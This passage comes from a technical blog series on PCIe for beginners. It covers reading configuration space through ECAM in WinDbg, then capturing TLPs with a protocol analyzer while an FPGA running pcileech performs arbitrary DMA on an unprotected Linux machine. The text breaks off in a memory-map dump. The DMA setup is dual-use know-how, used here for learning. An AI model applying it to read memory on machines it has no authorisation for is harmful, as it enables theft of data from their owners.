To actually get the full information about this device, we can use the fantastic tool at PCI Lookup to query the public information about PCI devices registered with the PCI-SIG. Let’s put the information about the device and vendor ID into the box:

And when we search, we get back this:

Which tells us this device is a Quadro K620 graphics card created by NVIDIA. The subsystem ID tells us that this particular card PCB was produced by HP, which was licensed out by NVIDIA.

What we saw in !devext is a good overview of what pci.sys specifically cares about showing us in the summary, but it only scratches the surface of all of the information in config space. To dump all of the information in configuration space, we can use the extension !pci 100 B D F where BDF is the BDF of our device in question. 100 is a set of flags that specifies that we want to dump all information about the device. The information displayed will be laid out in the order that it exists in the config space of the device. Prefixing each section is an offset, such as 02 for device id. This specifies the offset into config space that this value was read from. These offsets are detailed in the PCI specification and do not change between PCI versions for backwards compatibility purposes.

8: kd> !pci 100 2 0 0

PCI Configuration Space (Segment:0000 Bus:02 Device:00 Function:00)
Common Header:
    00: VendorID       10de Nvidia Corporation
    02: DeviceID       13bb
    04: Command        0507 IOSpaceEn MemSpaceEn BusInitiate SERREn InterruptDis 
    06: Status         0010 CapList 
    08: RevisionID     a2
    09: ProgIF         00 VGA
    0a: SubClass       00 VGA Compatible Controller
    0b: BaseClass      03 Display Controller
    0c: CacheLineSize  0000
    0d: LatencyTimer   00
    0e: HeaderType     80
    0f: BIST           00
    10: BAR0           f2000000
    14: BAR1           e000000c
    18: BAR2           00000000
    1c: BAR3           f000000c
    20: BAR4           00000000
    24: BAR5           00001001
    28: CBCISPtr       00000000
    2c: SubSysVenID    103c
    2e: SubSysID       1098
    30: ROMBAR         00000000
    34: CapPtr         60
    3c: IntLine        00
    3d: IntPin         01
    3e: MinGnt         00
    3f: MaxLat         00
Device Private:
    40: 1098103c 00000000 00000000 00000000
    50: 00000000 00000001 0023d6ce 00000000
    60: 00036801 00000008 00817805 fee001f8
    70: 00000000 00000000 00120010 012c8de1
    80: 00003930 00453d02 11010140 00000000
    90: 00000000 00000000 00000000 00040013
    a0: 00000000 00000006 00000002 00000000
    b0: 00000000 01140009 00000000 00000000
    c0: 00000000 00000000 00000000 00000000
    d0: 00000000 00000000 00000000 00000000
    e0: 00000000 00000000 00000000 00000000
    f0: 00000000 00000000 00000000 00000000
Capabilities:
    60: CapID          01 PwrMgmt Capability
    61: NextPtr        68
    62: PwrMgmtCap     0003 Version=3
    64: PwrMgmtCtrl    0008 DataScale:0 DataSel:0 D0 

    68: CapID          05 MSI Capability
    69: NextPtr        78
    6a: MsgCtrl        64BitCapable MSIEnable MultipleMsgEnable:0 (0x1) MultipleMsgCapable:0 (0x1)
    6c: MsgAddrLow     fee001f8
    70: MsgAddrHi      0
    74: MsgData        0

    78: CapID          10 PCI Express Capability
    79: NextPtr        00
    7a: Express Caps   0012 (ver. 2) Type:LegacyEP
    7c: Device Caps    012c8de1
    80: Device Control 3930 bcre/flr MRR:1K NS ap pf ET MP:256 RO ur fe nf ce
    82: Device Status  0000 tp ap ur fe nf ce
    84: Link Caps      00453d02
    88: Link Control   0140 es CC rl ld RCB:64 ASPM:None 
    8a: Link Status    1101 SCC lt lte NLW:x16 LS:2.5 
    9c: DeviceCaps2    00040013 CTR:3 CTDIS arifwd aor aoc32 aoc64 cas128 noro ltr TPH:0 OBFF:1 extfmt eetlp EETLPMax:0
    a0: DeviceControl2 0000 CTVal:0 ctdis arifwd aor aoeb idoreq idocom ltr OBFF:0 eetlp

Enhanced Capabilities:
    100: CapID         0002 Virtual Channel Capability
         Version       1
         NextPtr       258
    0104: Port VC Capability 1        00000000
    0108: Port VC Capability 2        00000000
    010c: Port VC Control             0000
    010e: Port VC Status              0000
    0110: VC Resource[0] Cap          00000000
    0114: VC Resource[0] Control      800000ff
    011a: VC Resource[0] Status       0000

    258: CapID         001e L1 PM SS Capability
         Version       1
         NextPtr       128
    25c: Capabilities  0028ff1f  PTPOV:5 PTPOS:0 PCMRT:255 L1PMS ASPML11 ASPML12 PCIPML11 PCIPML12
    260: Control1      00000000  LTRL12TS:0 LTRL12TV:0 CMRT:0 aspml11 aspml12 pcipml11 pcipml12
    264: Control2      00000028  TPOV:5 TPOS:0

    128: CapID         0004 Power Budgeting Capability
         Version       1
         NextPtr       600

    600: CapID         000b Vendor Specific Capability
         Version       1
         NextPtr       000
         Vendor Specific ID 0001 - Ver. 1  Length: 024

The nice thing about this view is that we can see detailed information about the Capabilities section of config space. Capabilities is a set of structures within the config space that describes exactly what features device is capable of. Capabilities includes information such as link speed and what kinds of interrupts the device supports. Any new features added to the PCI specification will be advertised through these structures, and the structures form a linked list of capabilities in config space that can be iterated through to discover all capabilities of the device. Not all of these capabilities are relevant to the OS, some are relevant only to aspects of hardware not covered by this post. For now, I won’t go into any further details of the capabilities of this device.

PCIe: It’s all about memory

So now that we’ve investigated a few devices and the hierarchy of a PCI bus, let’s talk about how the communication with software and PCI devices actually works. When I was first learning about PCI, I had a lot of trouble understanding what exactly was happening when software interfaces with a PCI device. Because the entire transaction is abstracted away from you as the software developer, it’s hard to build the mental model of what’s going on by just poking at PCI memory from a debugging tool. Hopefully this writeup will provide a better overview than what I was able to get when I was first starting out.

First off I will make a bold statement: All modern PCIe communication is done through memory reads and writes. If you understand how memory in PCIe works, you will understand how PCIe software communication works. (Yes, there are other legacy ways to communicate on certain platforms, but we will not discuss those because they are deprecated.)

Now, let’s talk about different types of memory on a modern platform. The CPU of your OS after very early in boot will be using virtual memory. That is, the memory addresses seen by your CPU are the view of memory mapped to the physical memory world.

For our purposes, there are two types of physical memory on a system:

RAM - Addresses that, when read or written to, is stored and retrieved from the DRAM DIMMs on your machine. This is what most people think of when they think “memory”.
Device Memory - Addresses that, when read or written to, talks to a device on the system. The keyword here is talks. It does not store memory on the device, it does not retrieve memory on the device (although the device might be able to both). The address you might be talking to might not even be memory at all, but a more ethereal “device register” that configures the inner workings of the device. It is up to the device what happens with this kind of access. All you are doing is communicating with a device. You will typically see this referred to as MMIO, which stands for Memory-Mapped I/O.

NOTE: Device memory for PCI will always read “all 1s” or “all FFs” whenever a device does not respond to the address accessed in a device memory region. This is a handy way to know when a device is actually responding or not. If you see all FFs, you know you’re reading invalid device addresses.

It is a misunderstanding of beginners that all physical memory is RAM. When software talks to a PCI device in the PCI region, it is not reading and writing from RAM. The device instead is receiving a packet (a TLP, Transmission-Layer Packet) from the Root Complex that is automatically generated for you by your CPU immediately when the address inside the PCI region is read/written. You do not create these packets in software, and all of these packets are generated completely behind the scenes as soon as this memory is accessed. In software, you cannot even see or capture these packets, instead requiring a special hardware testing device to intercept and view the packets being sent. More on this later.

If it helps, think of physical memory instead as a mapping of devices. RAM is a device which is mapped into physical memory for you. PCI also has regions mapped automatically for you. Though they are distinct and act very differently, they look the same to software.

In the following diagram, we can see how a typical system is mapping virtual memory to physical memory. Note that there are two regions of RAM and two regions of PCI memory. This is because certain older PCI devices can only address 32-bits of memory. Therefore, some RAM is moved up above 4GB if your RAM does not fit within the window of addresses under 4GB. Since your processor supports 64-bit addresses, this is not an issue. Additionally, a second window is created above the 4GB line for PCI devices which do support 64-bit addresses. Because the 4GB region can be very constrained, it is best for devices to move as much memory above 4GB as to not clutter the space below.

A very simplified view of how ranges of virtual addresses could be mapped to physical addresses. This ignores a large number of "special" regions in physical memory, but showcases how RAM and device memory are not the same.

Let’s talk first about the type of memory we’ve already seen: configuration space.

Configuration space is located in a section of memory called ECAM which stands for Extended Configuration Access Management. Because it is a form of device memory, in order to access this memory from the kernel (which uses virtual memory), the kernel must ask the memory manager to map this physical memory into a virtual address. Then, software instructions can use the virtual address of the mapping to read and write from physical addresses. On Windows, locating and mapping this memory is handled partially by pci.sys, partially by acpi.sys, and partially by the kernel (specifically the HAL).

NOTE: Typically the way device memory is mapped in Windows is through MmMapIoSpaceEx, which is an API drivers can use to map physical device memory. However, in order to do configuration space accesses, software must use HalGetBusDataByOffset and HalSetBusDataByOffset to ensure that the internal state of pci.sys is kept in synchronization with the configuration space reads/writes you are doing. If you try to map and change configuration space yourself, you might desync state from pci.sys and cause a BSOD.

NOTE: Where in physical memory the ECAM/PCI regions are located is platform dependent. The firmware at boot time will assign all special regions of physical memory of the system. The firmware then advertises the location of these regions to the OS during boot time. On x86-64 systems, the ECAM region will be communicated from firmware through ACPI using a table (a structure) called MCFG. Is it not important for now to know what specific protocol is used to retrieve this info, just understand that the OS retrieves the addresses of these regions from the firmware, which decided where to put them.

So in order to do a configuration space access, the kernel must map configuration space (ECAM) to virtual memory. This is what such a thing would look like:

A mapping of ECAM to virtual memory. Horribly not to scale.

After this, the kernel is now able to communicate with the configuration space of the device by using the virtual mapping. But what does this configuration space look like? Well, it’s just a bunch of blocks of configuration space structures we talked about above. Each possible BDF a device could have is given space in ECAM to configure it. It is laid out in such a way that the BDF of the device tells you exactly where its configuration space is in ECAM. That is, given a BDF, we can calculate the offset to add to the base of the ECAM region in order to talk to the device because all ECAM regions for each function are the same size.

If the device is not present, the system will read back all FFs (all 1s in binary). This would showcase that the device is not currently active on the system

From this diagram, we can start to see how the enumeration of PCIe actually takes place. When we read back valid config space data, we know a device exists at that BDF. If we read back FFs instead, we know the device is not in that slot or function. Of course, we don’t brute force every address in order to enumerate all devices, as that would be costly due to the overhead of the MMIO. But, a smart version of this brute force is how we can quickly enumerate all devices powered up and responding to us on config space.

Putting it all together - A software config space access

Now that we see how config space is accessed, we can put the two sides together (the hierarchy and the MMIO) in to see the full path of an instruction reading config space from kernel mode.

Let’s step through the entire path taken here (from left to right):

Some code running in kernel mode reads an offset from the ECAM virtual mapping.
The virtual mapping is translated by the page tables of the CPU into a physical address into ECAM.
The physical address is read, causing an operation to happen in the internal CPU Interconnect to inform the Root Complex of the access.
The Root Complex generates a packetized version of the request as a TLP that says “Read the value at offset 0x0 for device 02:00.0” and sends it through the hierarchy.
The TLP is received by this display controller on Bus 2 and sees that it is a configuration space TLP. It now knows to respond with a configuration space response TLP that contains the contents of the value at offset 0x0.

Now let’s look at the response:

The path of the response is much less interesting. The device responds with a special TLP containing the value at offset 0 (which we know is the Vendor ID). That packet makes its way back to the Requester (which was the Root Complex) and the interconnect informs the CPU to update the value of rax to the value of 0x10DE which is the vendor ID of the NVIDIA graphics card. The next instruction then begins to execute on the CPU.

As you can imagine, accesses this way can be quite a lot slower than that of RAM with all of this TLP generation. This is indeed true, and one of the main reasons there is more ways than this MMIO method in order to talk to a device. In the next post, I will go into more detail about the other method, DMA, and its vital importance to the ensuring that software can transfer memory as fast as possible between the CPU and the device.

Exercise: Accessing ECAM manually through WinDbg

So, we took a look at how a config space access theoretically happens, but let’s do the same thing ourselves with a debugger. To do that, we will want to:

Locate where ECAM is on the system.
Calculate the offset into ECAM to read the Vendor ID of the the device. For this, I chose the Multimedia Device @ 02:00.1 which is on the NVIDIA graphics card.
Perform a physical memory read at that address to retrieve the value.

The first step is locate ECAM. This part is a little tricky given that the location of ECAM comes through ACPI, specifically the MCFG table in ACPI. This is the table firmware uses to tell the OS where ECAM is located in the physical memory map of the system. There is a lot to talk about with ACPI and how it is used in combination with PCI, but for now I’ll just quickly skip to the relevant parts to achieve our goal.

In our debugger, we can dump the cached copies of all ACPI tables by using !acpicache. To dump MCFG, click on the link MCFG to dump its contents, or type !acpitable MCFG manually:

8: kd> !acpicache
Dumping cached ACPI tables...
  XSDT @(fffff7b6c0004018) Rev: 0x1 Len: 0x0000bc TableID: SLIC-WKS
  MCFG @(fffff7b6c0005018) Rev: 0x1 Len: 0x00003c TableID: SLIC-WKS
  FACP @(fffff7b6c0007018) Rev: 0x4 Len: 0x0000f4 TableID: SLIC-WKS
  APIC @(fffff7b6c0008018) Rev: 0x2 Len: 0x000afc TableID: SLIC-WKS
  DMAR @(fffff7b6c000a018) Rev: 0x1 Len: 0x0000c0 TableID: SLIC-WKS
  HPET @(fffff7b6c015a018) Rev: 0x1 Len: 0x000038 TableID: SLIC-WKS
  TCPA @(ffffdc89b07209f8) Rev: 0x2 Len: 0x000064 TableID: EDK2    
  SSDT @(ffffdc89b0720a88) Rev: 0x2 Len: 0x0003b3 TableID: Tpm2Tabl
  TPM2 @(ffffdc89b0720e68) Rev: 0x3 Len: 0x000034 TableID: EDK2    
  SSDT @(ffffdc89b07fc018) Rev: 0x1 Len: 0x0013a1 TableID: Plat_Wmi
  UEFI @(ffffdc89b07fd3e8) Rev: 0x1 Len: 0x000042 TableID: 
  BDAT @(ffffdc89b07fd458) Rev: 0x1 Len: 0x000030 TableID: SLIC-WKS
  MSDM @(ffffdc89b07fd4b8) Rev: 0x3 Len: 0x000055 TableID: SLIC-WKS
  SLIC @(ffffdc89b07fd538) Rev: 0x1 Len: 0x000176 TableID: SLIC-WKS
  WSMT @(ffffdc89b07fd6d8) Rev: 0x1 Len: 0x000028 TableID: SLIC-WKS
  WDDT @(ffffdc89b0721a68) Rev: 0x1 Len: 0x000040 TableID: SLIC-WKS
  SSDT @(ffffdc89b2580018) Rev: 0x2 Len: 0x086372 TableID: SSDT  PM
  NITR @(ffffdc89b26063b8) Rev: 0x2 Len: 0x000071 TableID: SLIC-WKS
  ASF! @(ffffdc89b2606548) Rev: 0x20 Len: 0x000074 TableID:  HCG
  BGRT @(ffffdc89b26065e8) Rev: 0x1 Len: 0x000038 TableID: TIANO   
  DSDT @(ffffdc89b0e94018) Rev: 0x2 Len: 0x021c89 TableID: SLIC-WKS
8: kd> !acpitable MCFG
HEADER - fffff7b6c0005018
  Signature:               MCFG
  Length:                  0x0000003c
  Revision:                0x01
  Checksum:                0x3c
  OEMID:                   HPQOEM
  OEMTableID:              SLIC-WKS
  OEMRevision:             0x00000001
  CreatorID:               INTL
  CreatorRev:              0x20091013
BODY - fffff7b6c000503c
fffff7b6`c000503c  00 00 00 00 00 00 00 00-00 00 00 d0 00 00 00 00  ................
fffff7b6`c000504c  00 00 00 ff 00 00 00 00                          ........

To understand how to read this table, unfortunately we need to look at the ACPI specification. Instead of making you do that, I will save you the pain and pull the relevant section here:

As the !acpitable command has already parsed and displayed everything up to Creator Revision in this table, the first 8 bytes of the BODY are going to be the 8 bytes of Reserved memory at offset 36. So, we skip those 8 bytes and find the following structure:

The first 8 bytes of this is the address of the ECAM region for the region following Reserved. So that means the offset of the ECAM base address is at offset 8.

BODY - fffff7b6c000503c
fffff7b6`c000503c  00 00 00 00 00 00 00 00-00 00 00 d0 00 00 00 00  ................
fffff7b6`c000504c  00 00 00 ff 00 00 00 00                          ........

For this system, ECAM is located at address: 0xD0000000. (Don’t forget to read this in little endian order)

To verify we got the correct address, let’s read the vendor ID of 00:00.0 which is also is the first 2 bytes of ECAM. We will do this using the !dw command, which stands for dump physical word (the exclamation point means physical). This command requires you specify a caching type, which for our case will always be [uc] for uncached. It also supplies a length, which is the number of words to read specified by L1.

NOTE: It is important that we always match the size of the target device memory to the size we are reading from software. This means, if the value we want to read is a 16-bit value (like Vendor ID), then we must perform a 16-bit read. Performing a 32-bit read might change the result of what the device responds with. For configuration space, we are okay to read larger sizes for Vendor ID, but this is not true in all cases. It’s good to get in the habit of matching the read size to the target size to avoid any unexpected results. Remember: Device memory is not RAM.

Putting that all together, we read the VendorID of 00:00.0 like so:

8: kd> !dw [uc] D0000000 L1
#d0000000 8086

The resulting value we read is 0x8086, which happens to be the vendor ID of Intel. To verify this is correct, let’s dump the same thing using !pci.

8: kd> !pci 100 0 0 0

PCI Configuration Space (Segment:0000 Bus:00 Device:00 Function:00)
Common Header:
    00: VendorID       8086 Intel Corporation

Reading VendorID from a specific Function

Now to calculate the ECAM address for another function we wish to talk to (NVIDIA card at 02:00.1), we will need to perform an “array access” manually by calculating the offset into ECAM using the BDF of the target function and some bit math.

The way to calculate this is present in the PCIe specification, which assigns a certain number of bits of ECAM for bus, device, and function to calculate the offset:

| 27 - 20 | 19 - 15 | 14 - 12     |  11 - 0       |
| Bus Nr  | Dev Nr  | Function Nr | Register      |

By filling in the BDF and shifting and ORing the results based on the bit position of each element, we can calculate an offset to add to ECAM.

I will use python but you can use whatever calculator you’d like:

>>> hex(0xD0000000 + ((2 << 20) | (0 << 15) | (1 << 12)))
'0xd0201000'

This means that the ECAM region for 02:00.1 is located at 0xD0201000.

Now to read the value of the VendorID from the function:

8: kd> !dw [uc] D0201000 L1
#d0201000 10de

The result was 0x10de, which we know from above is NVIDIA Corporation! That means we successfully read the first value from ECAM for this function.

Conclusion

This single post ended up being a lot longer than I expected! Rather than continue this single post, I will instead split this up and flesh out the series over time. There are so many topics I would like to cover about PCIe and only so much free time, but in the next post I will go into more detail about device BARs (a form of device-specific MMIO) and DMA (Direct Memory Access). This series will continue using the same tenants as before, focusing more on understanding rather than specific details.

Hopefully you enjoyed this small look into the world of PCIe! Be back soon with more.

Click here for Part 2!

Reversing Engineering for the Soul
Experiment - Packet Dumping PCIe DMA TLPs with a Protocol Analyzer and Pcileech
26 March 2024 at 00:00

Experiment - Packet Dumping PCIe DMA TLPs with a Protocol Analyzer and Pcileech

Reversing Engineering for the Soul

26 March 2024 at 00:00

Introduction

In this post, I will be going over a small experiment where we hook up a PCIe device capable of performing arbitrary DMA to a Keysight PCIe 3.0 Protocol Analyzer to intercept and observe the Transaction Layer Packets (TLPs) that travel over the link. The purpose of this experiment is to develop a solid understanding of how memory transfer takes place under PCIe.

This is post is part of a series on PCIe for beginners. I encourage you to read the other posts before this one!

Background: On Why PCIe Hardware is so Unapproachable

There are a couple recurring themes of working with PCIe that make it exceptionally difficult for beginners: access to information and cost. Unlike tons of technologies we use today in computing, PCIe is mostly a “industry only” club. Generally, if you do not or have not worked directly in the industry with it, it is unlikely that you will have access to the information and tools necessary to work with it. This is not intentionally a gatekeeping effort as much as it is that the field serves a niche group of hardware designers and the tools needed to work with it are generally prohibitively expensive for a single individual.

The data transfer speeds that the links work near the fastest cutting-edge data transfer speeds available to the time period in which the standard is put into practice. The most recent standard of PCIe 6.2 has proof of concept hardware that operates at a whopping 64 GigaTransfers/s (GT/s) per lane. Each transfer will transfer one bit, so that means that a full 16 lane link is operating in total at a little over 1 Terabit of information transfer per second. Considering that most of our TCP/IP networks are still operating at 1 Gigabit max and the latest cutting-edge USB4 standards operates at 40 Gigabit max, that is still an order of magnitude faster than the transfer speeds we ever encounter in our day-to-day.

To build electronic test equipment, say an oscilloscope, that is capable of analyzing the electrical connection of a 64GT/s serial link is an exceptional feat in 2024. These devices need to contain the absolute most cutting edge components, DACs, and FPGAs/ASICs being produced on the market to even begin to be able to observe the speed by which the data travels over a copper trace without affecting the signal. Cutting edge dictates a price, and that price easily hits many hundreds of thousands of USD quickly. Unless you’re absolutely flushed with cash, you will only ever see one of these in a hardware test lab at a select few companies working with PCIe links.

PCIe 6.0 transmitter compliance test solution

Shown: An incredibly expensive PCIe 6.0 capable oscilloscope. Image © Keysight Technologies

But, all is not lost. Due to a fairly healthy secondhand market for electronics test equipment and recycling, it is still possible for an individual to acquire a PCIe protocol interceptor and analyzer for orders of magnitude less than what they were sold for new. The tricky part is finding all of the different parts of the collective set that are needed. An analyzer device is not useful without a probe to intercept traffic, nor is it useful without the interface used to hook it up to your PC or the license to the software that runs it. All of these pieces unfortunately have to align to recreate a functioning device.

It should be noted that these protocol analyzers are special in that they can see everything happening on the link. They have the capability to analyze each of the three layers of the PCIe link stack: the Physical, Data Link, and Transaction layer. If you’re not specifically designing something focused within the Physical or Data Link layer, these captures are not nearly as important as the Transaction layer. It is impossible for a PC platform to “dump” PCIe traffic like network or USB traffic. The cost of adding such a functionality would well outweigh the benefit.

My New PCIe 3.0 Protocol Analyzer Setup

After a year or so of looking, I was finally lucky enough to find all of the necessary pieces for a PCIe 3.0 Protocol Analyzer on Ebay at the same time, so I took the risk and purchased each of these components for myself (for what I believe was a fantastic deal compared to even the used market). I believe I was able to find these devices listed at all because they were approaching about a decade old and, at max, support PCIe 3.0. As newer consumer devices on the market are quickly moving to 4.0 and above, I can guess that this analyzer was probably from a lab that has recently upgraded to a newer spec. This however does not diminish the usefulness of a 3.0 analyzer, as all devices of a higher spec are backwards compatible with older speeds and still a huge swath of devices on the market in 2024 are still PCIe 3.0. NVMe SSDs and consumer GFX cards have been moving to 4.0 for the enhanced speed, but they still use the same feature set as 3.0. Most newer features are reserved for the server space.

Finding historical pricing information for these devices and cards is nearly impossible. You pretty much just pay whatever the company listing the device wants to get rid of it for. It’s rare to find any basis for what these are really “worth”.

Here is a listing of my setup, with the exact component identifiers and listings that were necessary to work together. If you were to purchase one of these, I do recommend this setup. Note that cables and cards similar but not exactly the same identifiers might not be compatible, so be exact!

Agilent/Keysight U4301A PCI Express Protocol Analyzer Module - $1,800 USD (bundled with below)
- This is the actual analyzer module from Agilent that supports PCIe 3.0. This device is similar to a 1U server that must rack into a U4002A Digital Tester Chassis or a M9502A Chassis.
- The module comes installed with its software license on board. You do not need to purchase a separate license for its functionality.
- I used the latest edition of Windows 11 for the software.
- This single module can support up to 8 lanes of upstream and downstream at the same time. Two modules in a chassis would be required for 16 lanes of upstream and downstream.
- https://www.keysight.com/us/en/product/U4301A/pcie-analyzer.html
Agilent/Keysight U4002A Digital Tester Chassis - $1,800 USD (bundled with above)
- This is the chassis that the analyzer module racks into. The chassis has an embedded controller module on it at the bottom which will be the component that hooks up to the PC. This is in charge of controlling the U4301A module and collects and manages its data for sending back to the PC.
One Stop Systems OSS Host PCIe Card 7030-30048-01 A - $8 USD
- The host card that slots into a PCIe slot on the host PC’s motherboard. The cord and card should be plugged in and the module powered on for at least 4 minutes prior to booting the host PC.
Molex 74546-0403 PCIe x4 iPass Cable - $15.88 USD
- The cord that connects the embedded controller module in the chassis to the PC through the OSS Host PCIe card.
Agilent/Keysight U4321 -66408 PCIe Interposer Probe Card With Cables And Adapter - $1,850 USD
- This is the interposer card that sits between the device under test and the slot on the target machine. This card is powered by a 12V DC power brick.
- This is an x8 card, so it can at the max support 8 lanes of PCIe. Devices under test will negotiate down to 8 lanes if needed, so this is not an isssue.
- https://www.keysight.com/us/en/product/U4321A/pcie-interposer-probe.html
At least 2x U4321-61601 Solid Slot Interposer Cables are needed to attach to the U4321. 4x are needed for bidirectional x8 connection. These were bundled along with the above.
Total Damage: Roughly ~$4000 USD.

Shown: My U4301A Analyzer hooked up to my host machine

FPGA Setup for DMA with Pcileech

It’s totally possible to connect an arbitrary PCIe device, such as a graphics card, and capture its DMA for this experiment. However, I think it’s much nicer to create the experiment by being able to issue arbitrary DMA from a device and observing its communication under the analyzer. That way there’s not a lot of chatter from the regular device’s operation happening on the link that affects the results.

For this experiment, I’m using the fantastic Pcileech project. This project uses a range of possible Xilinx FPGA boards to perform arbitrary DMA operations with a target machine through the card. The card hooks up to a sideband host machine awaiting commands and sends and receives TLPs over a connection (typically USB, sometimes UDP) to the FPGA board that eventually gets sent/received on the actual PCIe link. Basically, this project creates a “tunnel” from PCIe TLP link to the host machine to perform DMA with a target machine.

If you are not aware, FPGA stands for Field-Programmable Gate Array. It is essentially a chip that can have all of its digital logic elements reprogrammed at runtime. This allows a hardware designer to create and change high speed hardware designs on the fly without having to actually create a custom silicon chip, which can easily run in the millions of USD. The development boards for these FPGAs start at about $200 for entry level boards and typically have lots of high and low speed I/O interfaces that the chip could be programmed to communicate to. Many of these FPGA boards support PCIe, so this is a great way to work with high speed protocols that cannot be handled by your standard microcontroller.

Artix -7 FPGA

Image © Advanced Micro Devices, Inc

FPGAs are a very difficult space to break into. For a beginner book on FPGAs, I highly recommend this new book from No Starch (Russell Merrick): Getting Started with FPGAs. However, to use the Pcileech project, you can purchase one of the boards listed under the project compatibility page on GitHub and use it without any FPGA knowledge.

For my project, I am using my Alinx AX7A035 PCIe 2.0 Development Board. This is a surprisingly cheap PCIe-capable FPGA board, and Alinx has proven to me to be a fantastic company to work with as an individual. Their prices are super reasonable for their power, the company provides vast documentation of their boards and schematics, and they also provide example projects for all of the major features of the board. I highly recommend their boards to anyone interested in FPGAs.

While the pcileech project does not have any support the AX7A035 board, it does have support for the same FPGA as the one used on the AX7A035. I had to manually port the project to this Alinx board myself by porting the HDL. Hopefully this port will provide interested parties with a cheap alternative board to the ones supported by the pcileech project as is.

In the project port, the device is ported to use Gigabit Ethernet to send and receive the TLPs instead of USB3. Gigabit Ethernet operates at about 32MB/s of memory for pcileech memory dumping, which is fairly slow compared to the speeds of USB 3.0 achieved by other pcileech devices (130MB/s). However, the board does not have a FT601 USB 3.0 chip to interface with, so the next fastest thing I can easily use on this board is Ethernet.

In this DMA setup, I have the Ethernet cord attached to the system the device is attacking. This means the system can send UDP packets to perform DMA with itself.

Link will be available soon to the ported design on my GitHub.

Shown: DMA setup. Alinx AX7A035 FPGA connected to a U4321 Slot Interposer connected to an AMD Zen 3 M-ITX Motherboard

Experiment - Viewing Configuration Space Packets

For more information about TLPs, please see Part 1 and Part 2 of my PCIe blog post series.

The first part of this experiment will be viewing what a Configuration Read Request (CfgRd) packet looks like under the analyzer. The target machine is a basic Ubuntu 22.04 Server running on a Zen 3 Ryzen 5 platform. This version of the OS does not have IOMMU support for AMD and therefore does not attempt to protect any of its memory. There is nothing special about the target machine other than the FPGA device plugged into it.

The first command we’re going to execute is the lspci command, which is a built-in Linux command used to list PCI devices connected to the system. This command provides a similar functionality to what Device Manager on Windows provides.

Using this command, we can find that the pcileech device is located at BDF 2a:00.0. This is bus 2a, device 00, and function 0.

The next command to execute is sudo lspci -vvv -s 2a:00.0 which will dump all configuration space for the given device.

-vvv means maximum verbosity. We want it to dump all information it can about configuration space.
-s 2a:00.0 means only dump the configuration space of the device with BDF 2a:00.0, which we found above.

Here we see a full printout of all of the details of the individual bits of each of the Capabilities in configuration space. We can also see that this pcileech device is masquerading as a Ethernet device, despite not providing any Ethernet functionality.

Now, let’s prepare the protocol analyzer to capture the CfgRd packets from the wire. This is done by triggering on TLPs sent over the link and filtering out all Data Link and Physical Layer packets that we do not care to view.

Filter out all packets that are not TLPs since we only care about capturing TLPs in this experiment

Now adding a trigger to automatically begin capturing packets as soon as a TLP is sent or received

With this set up, we can run the analyzer and wait for it to trigger on a TLP being sent or received. In this case, we are expecting the target machine to send CfgRd TLPs to the device to read its configuration space. The device is expected to respond with Completions with Data TLPs (CplD TLPs) containing the payload of the response to the configuration space read.

Capture showing CfgRd and CplD packets for successful reads and completions

In the above packet overview, we can see a few interesting properties of the packets listed by the analyzer.

We can see the CfgRd_0 packet is going Downstream (host -> device)
We can see the CplD for the packet is going Upstream (device -> host)
Under Register Number we see the offset of the 4-byte DWORD being read
Under Payload we can see the response data. For offset 0, this is the Vendor ID (2bytes) and Device ID (2bytes). 10EE is the vendor ID for Xilinx and 0666 is a the device id of the Ethernet device, as seen above in the lspci output.
We can see it was a Successful Completion.
We can see the Requester ID was 00:00.0 which is the Root Complex.
We can see the Completer ID was 1A:00.0 which is the Device.

Cool! Now let’s look at the individual packet structures of the TLPs themselves:

The TLP structure for the CfgRd for a 4-byte read of offset 0x00

Here we can see the structure of a real TLP generated from the AMD Root Complex and going over the wire to the FPGA DMA device. There are a few more interesting fields now to point out:

Type: 0x4 is the type ID for CfgRd_0.
Sequence Number: The TLP sent over the link has a sequence number associated that starts at 0x00 and increments by 1. The TLP is acknowledged by the receiver after successfully being sent using an Ack Data-Link Layer packet (not shown). This ensures every packet is acknowledge as being received.
Length: The Length field of this packet is set to 0x01, which means it wants to read 1 DWORD of configuration space.
Tag: The Tag is set to 0x23. This means that the Completion containing the data being read from config space must respond with the Tag of 0x23 to match up the request and response.
Register Number: We are reading from offset 0x00 of config space.
**Requester and Completer: **Here we can see that the packet is marked with the sender and receiver BDFs. Remember that config space packets are sent to BDFs directly!

Finally, let’s look at the structure of the Completion with Data (CplD) for the CfgRd request.

This is the response packet immediately sent back by the device responding to the request to read 4 bytes at offset 0.

Here are the interesting fields to point out again:

Type: 0x0A is the type for Completion
The TLP contains Payload Data, so the Data Attr Bit (D) is set to 1.
The Completer and Requester IDs remain the same. The switching hierarchy knows to return Completions back to their requester ID.
The Tag is 0x23, which means this is the completion responding to the above packet.
This packet has a Payload of 1 DWORD, which is 0xEE106606. When read as two little endian 2-byte values, this is 0x10EE and 0x0666.

We can also verify the same bytes of data were returned through a raw hex dump of config space:

Experiment - Performing and Viewing DMA to System RAM

Setup

For the final experiment, let’s do some DMA from our FPGA device to the target system! We will do this by using pcileech to send a request to read an address and length and observing the resulting data from RAM sent from the AMD Zen 3 system back to the device.

The first step is to figure out where the device is going to DMA to. Recall in the Part 2 post that the device is informed by the device driver software where to DMA to and from. In this case, our device does not have a driver installed at all for it. In fact, it is just sitting on the PCI bus after enumeration and doing absolutely nothing until commanded by the pcileech software over the UDP connection.

To figure out where to DMA to, we can dump the full physical memory layout of the system using the following:

gbps@testbench:~/pcileech$ sudo cat /proc/iomem
00001000-0009ffff : System RAM
  00000000-00000000 : PCI Bus 0000:00
  000a0000-000dffff : PCI Bus 0000:00
    000c0000-000cd7ff : Video ROM
  000f0000-000fffff : System ROM
00100000-09afefff : System RAM
0a000000-0a1fffff : System RAM
0a200000-0a20cfff : ACPI Non-volatile Storage
0a20d000-69384fff : System RAM
  49400000-4a402581 : Kernel code
  4a600000-4b09ffff : Kernel rodata
  4b200000-4b64ac3f : Kernel data
  4b9b9000-4cbfffff : Kernel bss
69386000-6a3edfff : System RAM
6a3ef000-84ab5017 : System RAM
84ab5018-84ac2857 : System RAM
84ac2858-85081fff : System RAM
850c3000-85148fff : System RAM
8514a000-88caefff : System RAM
  8a3cf000-8a3d2fff : MSFT0101:00
    8a3cf000-8a3d2fff : MSFT0101:00
  8a3d3000-8a3d6fff : MSFT0101:00
    8a3d3000-8a3d6fff : MSFT0101:00
8a3f0000-8a426fff : ACPI Tables
8a427000-8bedbfff : ACPI Non-volatile Storage
8bedc000-8cffefff : Reserved
8cfff000-8dffffff : System RAM
8e000000-8fffffff : Reserved
90000000-efffffff : PCI Bus 0000:00
  90000000-b3ffffff : PCI Bus 0000:01
